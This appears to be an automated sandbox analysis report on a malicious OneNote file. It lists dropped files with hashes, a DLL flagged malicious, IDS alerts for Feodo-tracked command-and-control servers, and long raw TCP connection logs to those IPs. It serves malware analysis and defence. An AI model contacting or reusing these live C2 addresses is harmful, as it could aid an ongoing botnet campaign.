                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3873
                                                                                                                                                                                                          Entropy (8bit):3.4769849539362796
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:Se8rO0dO5JWDuIFRbqzqgdCDDGTCDwfpd5rO0dO5JWDuh7+5DGqzWk7dCDGWG5CH:S6bIDzmqfGNfpibIDHLZhdQs4
                                                                                                                                                                                                          MD5:5F3F057564231FCB1032D939CBD58969
                                                                                                                                                                                                          SHA1:3DBB912A26A7892243271661A351777960F14429
                                                                                                                                                                                                          SHA-256:E8EB84B4CEDBBE60904CFD1D83871881C7395A1AA937C83D0B653F9CDD094CAB
                                                                                                                                                                                                          SHA-512:E0CF9628424DB200A640C827183148A50DFE919B3C6E7A7D4AEEB5B638487FD716A93508274D56970D97B818C723D743AB73464045BBC1B6D86E2981D9020DEC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...................................FL..................F.@.. .....Q{.....A..X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U4m..PROGRA~2.........L.qV.B....................V.....7<R.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......PlP..MICROS~1..R.......PMPqV.B.....z....................C...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P8R..Office16..B.......PMPqV.B.....z........................O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV.B....3.........................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3873
                                                                                                                                                                                                          Entropy (8bit):3.4769849539362796
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:Se8rO0dO5JWDuIFRbqzqgdCDDGTCDwfpd5rO0dO5JWDuh7+5DGqzWk7dCDGWG5CH:S6bIDzmqfGNfpibIDHLZhdQs4
                                                                                                                                                                                                          MD5:5F3F057564231FCB1032D939CBD58969
                                                                                                                                                                                                          SHA1:3DBB912A26A7892243271661A351777960F14429
                                                                                                                                                                                                          SHA-256:E8EB84B4CEDBBE60904CFD1D83871881C7395A1AA937C83D0B653F9CDD094CAB
                                                                                                                                                                                                          SHA-512:E0CF9628424DB200A640C827183148A50DFE919B3C6E7A7D4AEEB5B638487FD716A93508274D56970D97B818C723D743AB73464045BBC1B6D86E2981D9020DEC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jun 30 15:57:16 2015, mtime=Fri Mar 17 07:23:29 2023, atime=Tue Jun 30 15:57:16 2015, length=157872, window=hide
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1251
                                                                                                                                                                                                          Entropy (8bit):4.650673666781962
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:8vKo2rOAbdOEIK4WDjCh7+RAyNqzWFUTdCDhxYUULze1zek7aB6m:8vKrO0dO5JWDuh7+iGqzWFwdCDtdQhB6
                                                                                                                                                                                                          MD5:6655BFA3E8905835531681FC863C2D61
                                                                                                                                                                                                          SHA1:6C7740444F0740EB136087A8910B7F366AF9095B
                                                                                                                                                                                                          SHA-256:420DE09C00610043C04FDCD791D10238DC2D9A97F73D16E5E2A4DACBD151CF6E
                                                                                                                                                                                                          SHA-512:78715DFF41FEDBDA84A4102B851897E7E59E0CC55138576E4086B7E19EB0D153DEEBCF50A03D31857E078AB9781AF8155F5A3B158FFEB315005BEABB2CBBA164
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):316928
                                                                                                                                                                                                          Entropy (8bit):7.337848702590508
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                                                                                                                                          MD5:BFC060937DC90B273ECCB6825145F298
                                                                                                                                                                                                          SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                                                                                                                                          SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                                                                                                                                          SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                          File type:data
                                                                                                                                                                                                          Entropy (8bit):6.730648446607099
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Microsoft OneNote note (16024/2) 100.00%
                                                                                                                                                                                                          File name:iMedPub_LTD_6.one
                                                                                                                                                                                                          File size:120428
                                                                                                                                                                                                          MD5:4f69e6051723ee2f829d1e5f31463768
                                                                                                                                                                                                          SHA1:812424b2c260ed959ee81c5eb8ac160ea61b31ec
                                                                                                                                                                                                          SHA256:085ac1d179a061584f0bee7670d97af843d4a267ca343a884e5a2f462e3da5c8
                                                                                                                                                                                                          SHA512:e7146768d0acc58d7d931eecb2a48defc10124f6ffb994833070894a37c431a9a9749c7efadd422613fa67bb8b26274171b6f2d15496796efc6ae325790e4468
                                                                                                                                                                                                          SSDEEP:1536:RDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnXj:1BoC+tCYvSMVnte8ZP1Y6JT
                                                                                                                                                                                                          TLSH:29C32BF1A8025C0AE123C976B1FB661399D051ED42283B2BF87D507DD978A20D6DD8EF
                                                                                                                                                                                                          Icon Hash:d4dce0626664606c
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/17/23-09:24:11.489145 | TCP | 2404312 | ET CNC Feodo Tracker Reported CnC Server TCP group 7 | 49700 | 443 | 192.168.2.4 | 182.162.143.56
03/17/23-09:24:23.731826 | TCP | 2404308 | ET CNC Feodo Tracker Reported CnC Server TCP group 5 | 49702 | 8080 | 192.168.2.4 | 167.172.199.165
03/17/23-09:27:11.247095 | TCP | 2404324 | ET CNC Feodo Tracker Reported CnC Server TCP group 13 | 49735 | 8080 | 192.168.2.4 | 45.235.8.30
03/17/23-09:27:05.747710 | TCP | 2404320 | ET CNC Feodo Tracker Reported CnC Server TCP group 11 | 49731 | 443 | 192.168.2.4 | 213.239.212.5
03/17/23-09:24:37.030137 | TCP | 2404302 | ET CNC Feodo Tracker Reported CnC Server TCP group 2 | 49707 | 8080 | 192.168.2.4 | 104.168.155.143
03/17/23-09:26:11.494660 | TCP | 2404318 | ET CNC Feodo Tracker Reported CnC Server TCP group 10 | 49723 | 8080 | 192.168.2.4 | 206.189.28.199
03/17/23-09:23:59.776237 | TCP | 2404344 | ET CNC Feodo Tracker Reported CnC Server TCP group 23 | 49697 | 8080 | 192.168.2.4 | 91.121.146.47
03/17/23-09:24:06.184104 | TCP | 2404330 | ET CNC Feodo Tracker Reported CnC Server TCP group 16 | 49699 | 7080 | 192.168.2.4 | 66.228.32.31
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.066628933 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.066644907 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.066749096 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.066838026 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.066855907 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.111368895 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.344927073 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.344990969 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345050097 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345118999 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345144033 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345156908 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345176935 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345194101 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345206976 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345222950 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345232010 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345247984 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345263958 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345293999 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345305920 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345324039 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345390081 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345395088 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345417023 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.345463037 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.346106052 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.346225977 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.346240997 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.392657995 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.620610952 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.620893002 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.620942116 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.621300936 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.621386051 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.621434927 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.621459007 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.621510029 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.621607065 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.621714115 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.621738911 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.621798992 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.621880054 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.621906042 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622061968 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622142076 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622174978 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622225046 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622301102 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622325897 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622484922 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622570038 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622597933 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622761011 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622849941 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622876883 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.622931957 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.623006105 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.623064995 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.623243093 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.623327017 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.623353004 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.623382092 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.623600006 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.624043941 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.624978065 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625017881 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625065088 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625092030 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625148058 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625149965 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625188112 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625195026 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625214100 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625241041 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625255108 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625277042 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625329018 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.625400066 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.896547079 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.896656036 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.896775961 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.897135973 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.898030043 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.898071051 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.898102045 CET49696443192.168.2.4203.26.41.131
                                                                                                                                                                                                          Mar 17, 2023 09:23:18.898114920 CET44349696203.26.41.131192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:59.776237011 CET496978080192.168.2.491.121.146.47
                                                                                                                                                                                                          Mar 17, 2023 09:23:59.804301023 CET80804969791.121.146.47192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:59.804493904 CET496978080192.168.2.491.121.146.47
                                                                                                                                                                                                          Mar 17, 2023 09:23:59.814706087 CET496978080192.168.2.491.121.146.47
                                                                                                                                                                                                          Mar 17, 2023 09:23:59.842534065 CET80804969791.121.146.47192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:59.865778923 CET80804969791.121.146.47192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:59.865817070 CET80804969791.121.146.47192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:59.865922928 CET496978080192.168.2.491.121.146.47
                                                                                                                                                                                                          Mar 17, 2023 09:23:59.872924089 CET496978080192.168.2.491.121.146.47
                                                                                                                                                                                                          Mar 17, 2023 09:23:59.904704094 CET80804969791.121.146.47192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:23:59.952258110 CET496978080192.168.2.491.121.146.47
                                                                                                                                                                                                          Mar 17, 2023 09:24:01.670206070 CET496978080192.168.2.491.121.146.47
                                                                                                                                                                                                          Mar 17, 2023 09:24:01.670283079 CET496978080192.168.2.491.121.146.47
                                                                                                                                                                                                          Mar 17, 2023 09:24:01.698129892 CET80804969791.121.146.47192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:02.436954021 CET80804969791.121.146.47192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:24:02.664525032 CET496978080192.168.2.491.121.146.47
                                                                                                                                                                                                          Mar 17, 2023 09:25:10.148425102 CET49713443192.168.2.4159.89.202.34
                                                                                                                                                                                                          Mar 17, 2023 09:25:10.148466110 CET44349713159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:10.448393106 CET44349713159.89.202.34192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:16.741115093 CET497148080192.168.2.4159.65.88.10
                                                                                                                                                                                                          Mar 17, 2023 09:25:16.772496939 CET808049714159.65.88.10192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:17.434638023 CET497148080192.168.2.4159.65.88.10
                                                                                                                                                                                                          Mar 17, 2023 09:25:17.466041088 CET808049714159.65.88.10192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:18.028597116 CET497148080192.168.2.4159.65.88.10
                                                                                                                                                                                                          Mar 17, 2023 09:25:18.059927940 CET808049714159.65.88.10192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.486808062 CET49715443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.486881971 CET44349715186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.487023115 CET49715443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.487759113 CET49715443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.487801075 CET44349715186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.711339951 CET44349715186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.715863943 CET49716443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.715930939 CET44349716186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.716063023 CET49716443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.717216015 CET49716443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.717248917 CET44349716186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.942513943 CET44349716186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.944767952 CET49717443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.944834948 CET44349717186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.945121050 CET49717443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.945871115 CET49717443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:23.945904970 CET44349717186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.173734903 CET44349717186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.178262949 CET49718443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.178334951 CET44349718186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.178653955 CET49718443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.179604053 CET49718443192.168.2.4186.194.240.217
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.179636955 CET44349718186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:24.410630941 CET44349718186.194.240.217192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:29.747349977 CET497198080192.168.2.4149.56.131.28
                                                                                                                                                                                                          Mar 17, 2023 09:25:32.780581951 CET497198080192.168.2.4149.56.131.28
                                                                                                                                                                                                          Mar 17, 2023 09:25:32.884531975 CET808049719149.56.131.28192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:33.467417955 CET497198080192.168.2.4149.56.131.28
                                                                                                                                                                                                          Mar 17, 2023 09:25:33.570633888 CET808049719149.56.131.28192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:38.993881941 CET497208080192.168.2.472.15.201.15
                                                                                                                                                                                                          Mar 17, 2023 09:25:41.983608007 CET497208080192.168.2.472.15.201.15
                                                                                                                                                                                                          Mar 17, 2023 09:25:47.999798059 CET497208080192.168.2.472.15.201.15
                                                                                                                                                                                                          Mar 17, 2023 09:25:57.240087986 CET497218080192.168.2.41.234.2.232
                                                                                                                                                                                                          Mar 17, 2023 09:25:57.513428926 CET8080497211.234.2.232192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:58.016330957 CET497218080192.168.2.41.234.2.232
                                                                                                                                                                                                          Mar 17, 2023 09:25:58.288600922 CET8080497211.234.2.232192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:25:58.797503948 CET497218080192.168.2.41.234.2.232
                                                                                                                                                                                                          Mar 17, 2023 09:25:59.069643021 CET8080497211.234.2.232192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:04.491658926 CET497228080192.168.2.482.223.21.224
                                                                                                                                                                                                          Mar 17, 2023 09:26:04.543478966 CET80804972282.223.21.224192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:05.048072100 CET497228080192.168.2.482.223.21.224
                                                                                                                                                                                                          Mar 17, 2023 09:26:05.100370884 CET80804972282.223.21.224192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:05.610640049 CET497228080192.168.2.482.223.21.224
                                                                                                                                                                                                          Mar 17, 2023 09:26:05.662640095 CET80804972282.223.21.224192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:11.494659901 CET497238080192.168.2.4206.189.28.199
                                                                                                                                                                                                          Mar 17, 2023 09:26:11.526062012 CET808049723206.189.28.199192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:12.033034086 CET497238080192.168.2.4206.189.28.199
                                                                                                                                                                                                          Mar 17, 2023 09:26:12.064620018 CET808049723206.189.28.199192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:12.580019951 CET497238080192.168.2.4206.189.28.199
                                                                                                                                                                                                          Mar 17, 2023 09:26:12.611309052 CET808049723206.189.28.199192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:17.992981911 CET497248080192.168.2.4169.57.156.166
                                                                                                                                                                                                          Mar 17, 2023 09:26:21.002580881 CET497248080192.168.2.4169.57.156.166
                                                                                                                                                                                                          Mar 17, 2023 09:26:27.034291029 CET497248080192.168.2.4169.57.156.166
                                                                                                                                                                                                          Mar 17, 2023 09:26:33.244390011 CET497258080192.168.2.4107.170.39.149
                                                                                                                                                                                                          Mar 17, 2023 09:26:33.343367100 CET808049725107.170.39.149192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:33.847397089 CET497258080192.168.2.4107.170.39.149
                                                                                                                                                                                                          Mar 17, 2023 09:26:33.946022987 CET808049725107.170.39.149192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:34.456882954 CET497258080192.168.2.4107.170.39.149
                                                                                                                                                                                                          Mar 17, 2023 09:26:34.555433035 CET808049725107.170.39.149192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.010004997 CET49726443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.010071993 CET44349726103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.010181904 CET49726443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.011523962 CET49726443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.011557102 CET44349726103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.298228979 CET44349726103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.299186945 CET49727443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.299249887 CET44349727103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.299356937 CET49727443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.300081968 CET49727443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.300105095 CET44349727103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.589277983 CET44349727103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.590181112 CET49728443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.590238094 CET44349728103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.590337038 CET49728443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.590842009 CET49728443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.590868950 CET44349728103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.876348972 CET44349728103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.877898932 CET49729443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.877955914 CET44349729103.43.75.120192.168.2.4
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.878237963 CET49729443192.168.2.4103.43.75.120
                                                                                                                                                                                                          Mar 17, 2023 09:26:40.878762960 CET49729443192.168.2.4103.43.75.120
